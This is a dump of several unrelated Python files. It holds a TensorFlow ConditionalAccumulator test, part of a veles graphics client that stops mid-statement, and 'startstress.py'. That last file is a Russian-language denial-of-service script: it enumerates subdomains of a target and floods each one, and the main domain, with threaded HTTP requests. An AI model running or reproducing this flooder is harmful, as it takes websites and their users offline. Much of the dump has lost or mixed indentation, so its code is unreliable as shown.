  # create TFCluster object
  cluster = TFCluster()
  cluster.sc = sc
  cluster.meta = cluster_meta
  cluster.nodeRDD = nodeRDD
  cluster.cluster_info = cluster_info
  cluster.cluster_meta = cluster_meta
  cluster.input_mode = input_mode
  cluster.queues = queues
  cluster.server = server
  return cluster
|
startstress.py | print('Загрузка...')
import os
import time
import threading
try:
import requests
except:
os.system('pip install requests')
try:
import colorama
except:
os.system('pip install colorama')
if os.sys.platform == 'win32':
def clear():
os.system('cls')
else:
def clear():
os.system('clear')
clear()
def dos(target, port):
while True:
try:
res = requests.get(target + ":" + port)
print(colorama.Fore.RED + "[+]" +colorama.Fore.YELLOW + "Запрос отправлен!" + colorama.Fore.WHITE)
except requests.exceptions.ConnectionError:
print(colorama.Fore.RED + "[+] " + colorama.Fore.LIGHTGREEN_EX + "Ошибка подключения!" + colorama.Fore.WHITE)
time.sleep(0.1)
threads = 20
url = input(colorama.Fore.BLUE + "Домен: "+ colorama.Fore.YELLOW)
port = input(colorama.Fore.BLUE + "Порт: " + colorama.Fore.YELLOW)
try:
threads = int(input(colorama.Fore.BLUE + "Количество потоков: " + colorama.Fore.YELLOW))
except ValueError:
exit(colorama.Fore.RED + "Неверное количество потоков!")
if threads == 0:
exit(colorama.Fore.RED + "Неверное количество потоков!")
if not url.__contains__("."):
exit(colorama.Fore.RED + "Неверный домен")
subd = open('subd.txt', 'r')
subd = subd.read()
sub = []
l = ''
subb = []
for j in subd:
if not j == '\n':
l = l + j
else:
sub.append(l)
for k in sub:
try:
requests.get('https://' + k + '.' + url + port)
ex = False
except:
ex = True
if ex == False:
subb.append(k)
for h in subb:
print(colorama.Fore.RED + "[+]" + colorama.Fore.LIGHTGREEN_EX + " Запускаю атаку на домен " + h + '.' + url)
for d in range(0, threads):
thr = threading.Thread(target=dos, args=(h + '.' + url, port,))
thr.start()
print(colorama.Fore.RED + "[+]" + colorama.Fore.LIGHTGREEN_EX + " Атака на домен " + h + '.' + url + " запущена")
for i in range(0, threads):
print(colorama.Fore.RED + "[+]" + colorama.Fore.LIGHTGREEN_EX + " Запускаю атаку на основной домен")
thr = threading.Thread(target=dos, args=('https://' + url, port,))
thr.start()
print(colorama.Fore.RED + "[+]" + colorama.Fore.LIGHTGREEN_EX + " Атака на основной домен запущена")
print(colorama.Fore.RED + "[+]" + colorama.Fore.LIGHTGREEN_EX + " DoS атака запущена, ждите")
|
conditional_accumulator_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
# from functools import reduce
class ConditionalAccumulatorTest(test.TestCase):
  """Tests for `data_flow_ops.ConditionalAccumulator` (TF v1 graph mode).

  Covers construction/validation, apply_grad/take_grad semantics for MEAN and
  SUM reduction, static vs. dynamic shapes, global/local step gating, and
  concurrent apply/take behavior including cancellation on session close.
  """

  def testConstructorWithInvalidArg(self):
    with ops.Graph().as_default():
      with self.assertRaises(ValueError):
        data_flow_ops.ConditionalAccumulator(
            dtypes_lib.float32, name="Q", reduction_type="Invalid")

  @test_util.run_deprecated_v1
  def testAccumulatorSizeEmpty(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(dtypes_lib.float32, name="Q")
      self.assertEqual(q.num_accumulated().eval(), 0)

  @test_util.run_deprecated_v1
  def testAccumulatorSetGlobalStep(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      set_global_step_op = q.set_global_step(1)
      set_global_step_op.run()

  @test_util.run_deprecated_v1
  def testAccumulatorApplyGradFloat32(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      accum_op = q.apply_grad((10.0,))
      accum_op.run()

  @test_util.run_deprecated_v1
  def testDtypes(self):
    with self.cached_session() as sess:
      dtypes = [dtypes_lib.float16, dtypes_lib.float32, dtypes_lib.float64]
      for i in range(len(dtypes)):
        dtype = dtypes[i]
        q = data_flow_ops.ConditionalAccumulator(
            dtype, shape=tensor_shape.TensorShape([1]))
        elems = np.arange(10).astype(dtype.as_numpy_dtype)
        for e in elems:
          q.apply_grad((e,)).run()
        result = self.evaluate(q.take_grad(1))
        # Default reduction is MEAN.
        self.assertEqual(sum(elems) / len(elems), result)

  @test_util.run_deprecated_v1
  def testAccumulatorMultipleAccumulators(self):
    with self.cached_session():
      q_f32_0 = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      q_f32_1 = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      q_f16_0 = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float16, name="Q", shape=tensor_shape.TensorShape([1]))
      q_f16_1 = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float16, name="Q", shape=tensor_shape.TensorShape([1]))
      accums = [q_f16_0, q_f16_1, q_f32_0, q_f32_1]
      for i in range(len(accums)):
        accums[i].apply_grad((i + 10.0,)).run()
      for i in range(len(accums)):
        result = accums[i].take_grad(1).eval()
        self.assertEqual(result, i + 10.0)

  @test_util.run_deprecated_v1
  def testAccumulatorApplyAndTakeGradWithShape(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=(3, 2))
      elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
               [[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
      elems_ave = [[(a + b) / len(elems) for a, b in zip(x, y)]
                   for x, y in zip(elems[0], elems[1])]
      accum_ops = [q.apply_grad(x) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      is_all_equal = True
      val = self.evaluate(takeg_t)
      for i in range(len(val)):
        for j in range(len(val[i])):
          is_all_equal &= (val[i][j] == elems_ave[i][j])
      self.assertTrue(is_all_equal)

  @test_util.run_deprecated_v1
  def testAccumulatorApplyGradWithWrongShape(self):
    q = data_flow_ops.ConditionalAccumulator(
        dtypes_lib.float32, name="Q", shape=(3, 2))
    with self.assertRaises(ValueError):
      q.apply_grad([[1.0, 2.0], [3.0, 4.0]])
    with self.assertRaises(ValueError):
      q.apply_grad([[1.0], [2.0], [3.0]])

  @test_util.run_deprecated_v1
  def testAccumulatorDynamicShape(self):
    with self.cached_session() as sess:
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=None)
      x = array_ops.placeholder(dtypes_lib.float32)
      accum_op = q.apply_grad(x)
      elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
               [[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
      elems_ave = [[(a + b) / len(elems) for a, b in zip(c, d)]
                   for c, d in zip(elems[0], elems[1])]
      takeg_t = q.take_grad(1)
      for elem in elems:
        sess.run(accum_op, feed_dict={x: elem})
      is_all_equal = True
      val = self.evaluate(takeg_t)
      for i in range(len(val)):
        for j in range(len(val[i])):
          is_all_equal &= (val[i][j] == elems_ave[i][j])
      self.assertTrue(is_all_equal)

  @test_util.run_v1_only("b/120545219")
  def testAccumulatorWrongDynamicShape(self):
    with self.cached_session() as sess:
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=None)
      x = array_ops.placeholder(dtypes_lib.float32)
      accum_op = q.apply_grad(x)
      # First successful apply_grad determines shape
      sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]]})
      with self.assertRaises(errors_impl.InvalidArgumentError):
        sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0]]})
      with self.assertRaises(errors_impl.InvalidArgumentError):
        sess.run(accum_op, feed_dict={x: [[1.0], [2.0], [3.0]]})

  @test_util.run_deprecated_v1
  def testAccumulatorSizeAfterApplyGrad(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      accum_op = q.apply_grad((10.0,))
      self.assertEqual(q.num_accumulated().eval(), 0)
      accum_op.run()
      self.assertEqual(q.num_accumulated().eval(), 1)
      accum_op.run()
      self.assertEqual(q.num_accumulated().eval(), 2)

  @test_util.run_deprecated_v1
  def testAccumulatorSizeAfterApplyGradAndTakeGrad(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      accum_op = q.apply_grad((10.0,))
      extract_t = q.take_grad(2)
      # Applying gradient multiple times to increase size from 0 to 2.
      self.assertEqual(q.num_accumulated().eval(), 0)
      accum_op.run()
      self.assertEqual(q.num_accumulated().eval(), 1)
      accum_op.run()
      self.assertEqual(q.num_accumulated().eval(), 2)
      # Extract will reduce size to 0
      extract_t.op.run()
      self.assertEqual(q.num_accumulated().eval(), 0)
      # Take gradients always sets the size back to 0 if successful.
      accum_op = q.apply_grad((10.0,), local_step=1)
      accum_op.run()
      accum_op.run()
      accum_op.run()
      accum_op.run()
      self.assertEqual(q.num_accumulated().eval(), 4)
      extract_t.op.run()
      self.assertEqual(q.num_accumulated().eval(), 0)

  @test_util.run_deprecated_v1
  def testAccumulatorTakeGradMean(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      elems = [10.0, 20.0]
      accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      val = self.evaluate(takeg_t)
      self.assertEqual(15.0, val)
      accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
      takeg_t = q.take_grad(constant_op.constant(1))
      for accum_op in accum_ops:
        accum_op.run()
      val = self.evaluate(takeg_t)
      self.assertEqual(15.0, val)

  @test_util.run_deprecated_v1
  def testAccumulatorTakeGradSum(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32,
          name="Q",
          shape=tensor_shape.TensorShape([1]),
          reduction_type="SUM")
      elems = [10.0, 20.0]
      accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      val = self.evaluate(takeg_t)
      self.assertEqual(30.0, val)
      accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
      takeg_t = q.take_grad(constant_op.constant(1))
      for accum_op in accum_ops:
        accum_op.run()
      val = self.evaluate(takeg_t)
      self.assertEqual(30.0, val)

  @test_util.run_deprecated_v1
  def testAccumulatorTakeGradInvalidReductionType(self):
    with self.assertRaises(ValueError):
      data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32,
          name="Q",
          shape=tensor_shape.TensorShape([1]),
          reduction_type="Invalid")

  @test_util.run_v1_only("b/120545219")
  def testAccumulatorInvalidTakeGrad(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      elems = [10.0, 20.0]
      accum_ops = [q.apply_grad((x,)) for x in elems]
      takeg_t = q.take_grad(-1)
      for accum_op in accum_ops:
        accum_op.run()
      with self.assertRaises(errors_impl.InvalidArgumentError):
        self.evaluate(takeg_t)

  @test_util.run_deprecated_v1
  def testAccumulatorRepeatedTakeGradMean(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      elems = [10.0, 20.0]
      elems_ave = sum(elems) / len(elems)
      accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      val = self.evaluate(takeg_t)
      self.assertEqual(elems_ave, val)
      elems = [20.0, 30.0]
      elems_ave = sum(elems) / len(elems)
      accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      val = self.evaluate(takeg_t)
      self.assertEqual(elems_ave + 0.0, val)

  @test_util.run_deprecated_v1
  def testAccumulatorRepeatedTakeGradSum(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32,
          name="Q",
          shape=tensor_shape.TensorShape([1]),
          reduction_type="SUM")
      elems = [10.0, 20.0]
      elems_sum = 30.0
      accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      val = self.evaluate(takeg_t)
      self.assertEqual(elems_sum, val)
      elems = [20.0, 30.0]
      elems_sum = 50.0
      accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
      takeg_t = q.take_grad(1)
      for accum_op in accum_ops:
        accum_op.run()
      val = self.evaluate(takeg_t)
      self.assertEqual(elems_sum, val)

  @test_util.run_deprecated_v1
  def testAccumulatorIncrementGlobalStep(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      global_step = variables.Variable(0, name="global_step")
      new_global_step = math_ops.add(global_step, 1)
      inc_global_step = state_ops.assign(global_step, new_global_step)
      set_global_step_op = q.set_global_step(new_global_step)
      self.evaluate(variables.global_variables_initializer())
      for _ in range(3):
        set_global_step_op.run()
        self.evaluate(inc_global_step)

  @test_util.run_deprecated_v1
  def testAccumulatorSetGlobalStepPreventsAccumulation(self):
    with self.cached_session():
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      local_steps = range(1000, 1005)
      accum_ops = [q.apply_grad((0.0 + x,), local_step=x) for x in local_steps]
      for ls in local_steps:
        set_global_step_op = q.set_global_step(ls)
        set_global_step_op.run()
        for accum_op in accum_ops:
          accum_op.run()
        takeg_t = q.take_grad(1)
        val = self.evaluate(takeg_t)
        # Only gradients with local_step >= the global step should count.
        self.assertEqual(0.0 + sum(x for x in local_steps
                                   if x >= ls) / sum(1 for x in local_steps
                                                     if x >= ls), val)

  @test_util.run_v1_only("b/120545219")
  def testParallelApplyGrad(self):
    # We need each thread to keep its own device stack or the device scopes
    # won't be properly nested.
    ops.get_default_graph().switch_to_thread_local()
    with self.cached_session() as sess:
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
      accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
      takeg_t = q.take_grad(1)

      def apply_grad(accum_op):
        self.evaluate(accum_op)

      threads = [
          self.checkedThread(
              target=apply_grad, args=(o,)) for o in accum_ops
      ]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()
      val = self.evaluate(takeg_t)
      self.assertEqual(val, sum(elems) / len(elems))

  @test_util.run_v1_only("b/120545219")
  def testParallelTakeGrad(self):
    # We need each thread to keep its own device stack or the device scopes
    # won't be properly nested.
    ops.get_default_graph().switch_to_thread_local()
    with self.cached_session() as sess:
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      elems = [e for e in range(10)]
      accum_ops = [q.apply_grad((np.float32(e),), local_step=e) for e in elems]
      takeg_t = q.take_grad(1)

      def apply_grad():
        for accum_op in accum_ops:
          time.sleep(1.0)
          self.evaluate(accum_op)

      apply_grad_thread = self.checkedThread(target=apply_grad)
      results = []

      def take_grad():
        results.append(self.evaluate(takeg_t))

      threads = [self.checkedThread(target=take_grad) for _ in range(10)]
      for thread in threads:
        thread.start()
      apply_grad_thread.start()
      for thread in threads:
        thread.join()
      apply_grad_thread.join()
      self.assertItemsEqual(elems, results)

  @test_util.run_v1_only("b/120545219")
  def testAccumulatorApplyAndBlockingTake(self):
    # We need each thread to keep its own device stack or the device scopes
    # won't be properly nested.
    ops.get_default_graph().switch_to_thread_local()
    with self.cached_session() as sess:
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      elems = [10.0, 20.0, 30.0]
      elems_ave = sum(elems) / len(elems)
      accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
      takeg_t = q.take_grad(3)

      def apply_grad():
        time.sleep(1.0)
        for accum_op in accum_ops:
          self.evaluate(accum_op)

      return_array = []

      def take_grad():
        return_array.append(self.evaluate(takeg_t))

      accum_thread = self.checkedThread(target=apply_grad)
      takeg_thread = self.checkedThread(target=take_grad)
      accum_thread.start()
      takeg_thread.start()
      accum_thread.join()
      takeg_thread.join()
      self.assertEqual([elems_ave], return_array)

  def _blocking_takeg(self, sess, takeg_op):
    # Helper run on a side thread: the take_grad blocks until cancelled.
    with self.assertRaisesOpError("was cancelled"):
      self.evaluate(takeg_op)

  @test_util.run_v1_only("b/120545219")
  def testAccumulatorCancel(self):
    with self.cached_session() as sess:
      q = data_flow_ops.ConditionalAccumulator(
          dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
      takeg_t = q.take_grad(1)
      takeg_thread = self.checkedThread(
          self._blocking_takeg, args=(sess, takeg_t))
      takeg_thread.start()
      time.sleep(1.0)
      sess.close()  # Will cancel blocked operation
      takeg_thread.join()
# Run the test suite under the TensorFlow test runner when executed directly.
if __name__ == "__main__":
  test.main()
|
graphics_client.py | # -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Jan 31, 2014
Contains the GraphicsClient class, which handles all interaction with the main
graphics window
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
import argparse
from collections import defaultdict
import datetime
import errno
import functools
import gc
import logging
from importlib import import_module
import os
import signal
import socket
import threading
from veles.dot_pip import install_dot_pip
install_dot_pip()
import snappy
import tornado.ioloop as ioloop
from twisted.internet.error import ReactorNotRunning
from twisted.internet import reactor
import zmq
from veles.config import root
from veles.txzmq import ZmqConnection, ZmqEndpoint
from veles.iplotter import IPlotter
from veles.logger import Logger
from veles.pickle2 import pickle, setup_pickle_debug
class ZmqSubscriber(ZmqConnection):
    """ZeroMQ SUB connection that forwards incoming plot events to a GraphicsClient."""

    socketType = zmq.SUB

    def __init__(self, graphics, *args, **kwargs):
        super(ZmqSubscriber, self).__init__(*args, **kwargs)
        # Receive only messages published under the "graphics" topic.
        self.socket.set(zmq.SUBSCRIBE, b'graphics')
        self.graphics = graphics

    def messageReceived(self, message):
        frame = message[0]
        self.graphics.debug("Received %d bytes", len(frame))
        # Strip the topic prefix, then decompress and unpickle the payload.
        raw_data = snappy.decompress(frame[len('graphics'):])
        self.graphics.update(pickle.loads(raw_data), raw_data)
class GraphicsClient(Logger):
""" Class handling all interaction with the main graphics window.
"""
ui_update_interval = 0.01
gc_limit = 10
def __init__(self, backend, *endpoints, **kwargs):
    """Initializes the client.

    Args:
        backend: matplotlib backend name (e.g. "TkAgg", "WebAgg"),
            or "no" to disable rendering.
        *endpoints: ZeroMQ endpoint strings to connect the subscriber to.
        **kwargs: optional "webagg_fifo" (FIFO path to publish the WebAgg
            port to) and "dump_dir" (directory for pickled plot dumps).
    """
    super(GraphicsClient, self).__init__()
    webagg_fifo = kwargs.get("webagg_fifo")
    self.backend = backend
    if self.backend == "WebAgg":
        # Real port is discovered later in run(); 0 means "not chosen yet".
        self._webagg_port = 0
    zmq_endpoints = []
    for ep in endpoints:
        zmq_endpoints.append(ZmqEndpoint("connect", ep))
    self.zmq_connection = ZmqSubscriber(self, zmq_endpoints)
    self._lock = threading.Lock()
    self._started = False
    self._shutted_down = False
    self.webagg_fifo = webagg_fifo
    # Triggers a gc.collect() every gc_limit processed events (see update()).
    self._gc_counter = 0
    # Per-plotter count of in-flight renders; used to drop too-frequent updates.
    self._balance = defaultdict(int)
    self._dump_dir = kwargs.get("dump_dir")
    # PDF export state (guarded by _pdf_lock).
    self._pdf_lock = threading.Lock()
    self._pdf_trigger = False
    self._pdf_pages = None
    self._pdf_file_name = None
    self._pdf_units_served = set()
    self._pdf_unit_chains = set()
    # Install our signal handlers, remembering the originals so __del__
    # can restore SIGINT.
    self._sigint_initial = signal.signal(signal.SIGINT,
                                         self._sigint_handler)
    self._sigusr2_initial = signal.signal(signal.SIGUSR2,
                                          self._sigusr2_handler)
def __del__(self):
    """Restore the original SIGINT handler if __init__ replaced it."""
    previous = getattr(self, "_sigint_initial", None)
    if previous is None:
        return
    signal.signal(signal.SIGINT, previous)
def run(self):
    """Creates and runs main graphics window.

    Selects the matplotlib backend (falling back to WebAgg on import
    failure), wires the backend's event loop into the twisted reactor,
    and finally calls self._run().

    Raises:
        Re-raises any setup exception after releasing the internal lock.
    """
    # NOTE(review): early `return`s below exit while still holding
    # self._lock — presumably _run()/shutdown() own the release; confirm.
    self._lock.acquire()
    if self.backend == "no":
        # Headless mode: no matplotlib at all.
        self._run()
        return
    Plotter = import_module("veles.plotter").Plotter
    try:
        if self._shutted_down:
            return
        self._started = True
        import matplotlib
        if self.backend:
            matplotlib.use(self.backend)
        try:
            self.pkgs = Plotter.import_matplotlib()
        except ImportError:
            # BUGFIX: the original call passed a "%s" format string with no
            # argument, so the failing backend name was never logged; supply
            # it as a lazy logging arg (same style as self.info below).
            self.warning("%s backend is not loadable, falling back to WebAgg",
                         self.backend)
            matplotlib.use("WebAgg", force=True)
            try:
                self.pkgs = Plotter.import_matplotlib()
            except ImportError:
                self.exception("Failed to load WebAgg matplotlib backend")
                return
        self.pp = pp = self.pkgs["pp"]
        pp.ion()
        # Hook the chosen GUI toolkit's event pump into the twisted reactor.
        if pp.get_backend() == "TkAgg":
            from six.moves import tkinter
            self.root = tkinter.Tk()
            self.root.withdraw()
            reactor.callLater(GraphicsClient.ui_update_interval,
                              self._process_tk_events)
            # tkinter.mainloop()
        elif pp.get_backend() == "Qt4Agg":
            import PyQt4
            self.root = PyQt4.QtGui.QApplication([])
            reactor.callLater(GraphicsClient.ui_update_interval,
                              self._process_qt_events)
            # self.root.exec_()
        elif pp.get_backend() == "WxAgg":
            import wx
            self.root = wx.PySimpleApp()
            reactor.callLater(GraphicsClient.ui_update_interval,
                              self._process_wx_events)
            # self.root.MainLoop()
        elif pp.get_backend() == "WebAgg":
            self.condition = threading.Condition()
            with self.condition:
                # Wait until the first figure is shown (show_figure notifies),
                # then probe for a free TCP port starting at the configured one.
                self.condition.wait()
                free_port = root.common.graphics.matplotlib.webagg_port - 1
                result = 0
                while result == 0:
                    free_port += 1
                    sock = socket.socket(socket.AF_INET,
                                         socket.SOCK_STREAM)
                    result = sock.connect_ex(("localhost", free_port))
                    sock.close()
                self._webagg_port = free_port
                matplotlib.rcParams['webagg.port'] = free_port
                matplotlib.rcParams['webagg.open_in_browser'] = 'False'
                self.info("Launching WebAgg instance on port %d",
                          free_port)
            if self.webagg_fifo is not None:
                # Publish the chosen port through the FIFO once the
                # reactor is running.
                fifo = os.open(self.webagg_fifo,
                               os.O_WRONLY | os.O_NONBLOCK)
                self._webagg_port_bytes = \
                    str(self._webagg_port).encode()
                reactor.callWhenRunning(self._write_webagg_port, fifo)
    except:
        self._lock.release()
        raise
    self._run()
    def update(self, plotter, raw_data):
        """Processes one plotting event.

        A ``plotter`` of None is the termination command and triggers
        shutdown().  Otherwise the raw message is optionally dumped to disk
        and the plotter is validated and scheduled for rendering on the
        reactor thread.
        """
        if plotter is not None:
            if self._dump_dir:
                # Persist the raw pickled message for offline debugging.
                file_name = os.path.join(self._dump_dir, "%s_%s.pickle" % (
                    plotter.name.replace(" ", "_"),
                    datetime.datetime.now().strftime('%Y-%m-%d_%H:%M:%S')))
                with open(file_name, "wb") as fout:
                    fout.write(raw_data)
                self.info("Wrote %s", file_name)
            del raw_data
            # Unpickled plot payloads can be large; collect periodically.
            self._gc_counter += 1
            if self._gc_counter >= GraphicsClient.gc_limit:
                gc.collect()
                self._gc_counter = 0
            if self.backend == "no":
                # Plotting disabled (--backend no): dump-only mode.
                return
            if self._balance[plotter.id] > 0:
                # A previous update for this plotter is still being rendered.
                self.warning("Skipped %s: too frequent updates or too slow "
                             "drawing", plotter)
                return
            self._balance[plotter.id] += 1
            plotter.set_matplotlib(self.pkgs)
            plotter.show_figure = self.show_figure
            if not IPlotter.providedBy(plotter):
                self.warning("%s does not provide IPlotter interface", plotter)
                self._balance[plotter.id] -= 1
                return
            try:
                plotter.verify_interface(IPlotter)
            except:
                self.exception("Plotter %s is not fully implemented, skipped",
                               plotter)
                self._balance[plotter.id] -= 1
                return
            if self._pdf_trigger or self.backend == "pdf":
                # PDF mode: render into the shared PdfPages instead of a window.
                payload = functools.partial(self._save_pdf, plotter)
            else:
                payload = plotter.redraw

            def work():
                # Runs on the reactor thread; always decrement the balance,
                # even when rendering fails.
                self.debug("Begin rendering %s", plotter)
                try:
                    payload()
                finally:
                    self._balance[plotter.id] -= 1
                self.debug("End rendering %s", plotter)

            reactor.callFromThread(work)
        else:
            self.debug("Received the command to terminate")
            self.shutdown()
def show_figure(self, figure):
if self.pp.get_backend() != "WebAgg":
figure.show()
else:
with self.condition:
self.condition.notify()
    def shutdown(self):
        """Stops the GUI main loop, the reactor and the ZeroMQ connection.

        Idempotent: does nothing if the client has not started yet or has
        already been shut down.
        """
        with self._lock:
            if not self._started or self._shutted_down:
                return
            self.info("Shutting down")
            self._shutted_down = True
            # Stop whichever GUI event loop is active for this backend.
            if self.pp.get_backend() == "TkAgg":
                self.root.destroy()
            elif self.pp.get_backend() == "Qt4Agg":
                self.root.quit()
            elif self.pp.get_backend() == "WxAgg":
                self.root.ExitMainLoop()
            elif self.pp.get_backend() == "WebAgg":
                ioloop.IOLoop.instance().stop()
            try:
                reactor.stop()
            except ReactorNotRunning:
                # Reactor may have stopped already (e.g. via SIGINT).
                pass
            # Not strictly necessary, but prevents from DoS
            self.zmq_connection.shutdown()
    def _run(self):
        """Runs the blocking event loop for the selected backend.

        Releases ``self._lock`` from inside the running loop, signalling
        that startup has completed.
        """
        self.info("Graphics client is running in process %d", os.getpid())
        # NOTE: short-circuit order matters — when backend == "no",
        # self.pp was never assigned in run().
        if self.backend == "no" or self.pp.get_backend() != "WebAgg":
            reactor.callWhenRunning(self._lock.release)
            try:
                reactor.run()
            except ReactorNotRunning:
                pass
        else:
            # WebAgg: tornado's ioloop is driven by pp.show() instead of
            # the Twisted reactor (which runs in the main thread, see main()).
            ioloop.IOLoop.instance().add_callback(self._lock.release)
            self.pp.show()
        self.info("Finished")
def _process_qt_events(self):
self.root.processEvents()
reactor.callLater(GraphicsClient.ui_update_interval,
self._process_qt_events)
def _process_tk_events(self):
self.root.update()
reactor.callLater(GraphicsClient.ui_update_interval,
self._process_tk_events)
def _process_wx_events(self):
self.root.ProcessPendingEvents()
reactor.callLater(GraphicsClient.ui_update_interval,
self._process_wx_events)
def _write_webagg_port(self, fifo):
try:
written = os.write(fifo, self._webagg_port_bytes)
except (OSError, IOError) as ioe:
if ioe.args[0] in (errno.EAGAIN, errno.EINTR):
written = 0
if written != len(self._webagg_port_bytes):
reactor.callWhenRunning(self._write_webagg_port, fifo)
else:
self.debug("Wrote the WebAgg port to pipe")
os.close(fifo)
    def _save_pdf(self, plotter):
        """Renders *plotter* and appends its figure to the current PDF.

        The PDF is closed (and opened with the system viewer) once every
        distinct plotter has been served, i.e. after one full round of
        plotting units.
        """
        with self._pdf_lock:
            figure = plotter.redraw()
            if plotter.id in self._pdf_units_served:
                # Seen this plotter before => one full cycle is complete.
                from veles.portable import show_file
                self._pdf_trigger = False
                self._pdf_pages.close()
                self._pdf_pages = None
                self._pdf_units_served.clear()
                self._pdf_unit_chains.clear()
                self.info("Finished writing PDF %s", self._pdf_file_name)
                show_file(self._pdf_file_name)
                self._pdf_file_name = None
                if self.backend != "pdf":
                    # One-shot mode (armed via SIGUSR2): stop after one PDF.
                    return
            if self._pdf_pages is None:
                # Lazily create the PdfPages target on first use.
                now = datetime.datetime.now()
                out_dir = os.path.join(root.common.dirs.cache, "plots")
                try:
                    os.makedirs(out_dir, mode=0o775)
                except OSError:
                    # Directory already exists.
                    pass
                self._pdf_file_name = os.path.join(
